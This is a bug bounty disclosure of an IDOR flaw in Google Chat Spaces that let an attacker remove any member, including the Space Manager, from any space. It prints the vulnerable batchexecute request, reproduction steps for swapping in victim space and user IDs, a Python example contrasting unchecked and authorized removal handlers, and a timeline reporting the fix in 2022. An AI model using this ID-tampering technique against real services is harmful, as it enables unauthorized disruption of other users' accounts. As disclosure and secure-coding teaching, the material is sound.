IDOR leads to removing members from any Google Chat Space.

In Google Chat Spaces, the creator automatically becomes the Space Manager.

Due to the IDOR vulnerability, an attacker could remove the Space Manager and members from any Space.

Vulnerable request:

POST /u/0/_/DynamiteWebUi/data/batchexecute?rpcids=itoCId&source-path=%2Fu%2F0%2Fmole%2Fworld&f.sid=2214863011575308312&bl=boq_dynamiteuiserver_20220624.01_p0&hl=en&soc-app=1&soc-platform=1&soc-device=1&_reqid=14582833&rt=c HTTP/2
Host: chat.google.com

[[["itoCId","[[],["space/AAAAuypwSbs","AAAAuypwSbs",2],4,[["user/105599426893724266332",null,"105599426893724266332",null,["105599426893724266332","human/105599426893724266332",0],"user/human/105599426893724266332"]],null,null,[]]",null,"generic"]]]&at=ALDO5-NfcbsvAFhduORqxN84kZGt:1656869432201&

By changing the Space ID and user ID, an attacker could remove members from any space.

Steps to reproduce:

1) Go to https://mail.google.com/chat/u/0/#chat/space/

2) Open "View Members", click "Remove from space", and intercept the request.

3) Replace the user ID and Space ID with the victim's ID and Space ID, and send the request.

4) The victim will be removed from the space.
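The missing check behind this class of bug, shown as an added example that is not from the original report and is not Google's code: a remove-member handler that trusts the space ID and user ID in the request, next to one that authorizes the caller against the target space first. The data model, role names, function names and the removal policy are assumptions made for illustration.

```python
# Added illustration: object-level authorization for a "remove member" action.
# The data model, role names and policy are assumptions, not Google's code.
from dataclasses import dataclass, field

MANAGER, MEMBER = "manager", "member"


class Forbidden(Exception):
    """Caller is not allowed to act on this space or member."""


@dataclass
class Space:
    space_id: str
    roles: dict = field(default_factory=dict)  # user_id -> role


def build_spaces():
    # Constructed sample data: two unrelated spaces.
    return {
        "space/A": Space("space/A", {"alice": MANAGER, "bob": MEMBER}),
        "space/B": Space("space/B", {"mallory": MANAGER}),
    }


def remove_member_vulnerable(spaces, caller_id, space_id, target_id):
    # IDOR: space_id and target_id come straight from the request body and
    # caller_id is never compared against the space's membership.
    return spaces[space_id].roles.pop(target_id, None) is not None


def remove_member_checked(spaces, caller_id, space_id, target_id):
    # caller_id must come from the authenticated session, never the body.
    space = spaces.get(space_id)
    caller_role = space.roles.get(caller_id) if space else None
    # Same error for "no such space" and "not a member", so the response
    # does not confirm which space IDs exist.
    if caller_role is None or target_id not in space.roles:
        raise Forbidden("not permitted")
    # Assumed policy: managers may remove anyone, members only themselves.
    if caller_role != MANAGER and caller_id != target_id:
        raise Forbidden("not permitted")
    del space.roles[target_id]
    return True
```
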


Reported: 04-07-2022

Triaged: 04-07-2022

Accepted: 04-07-2022

Rewarded: 19-07-2022

Fix confirmed: 14-08-2022


















































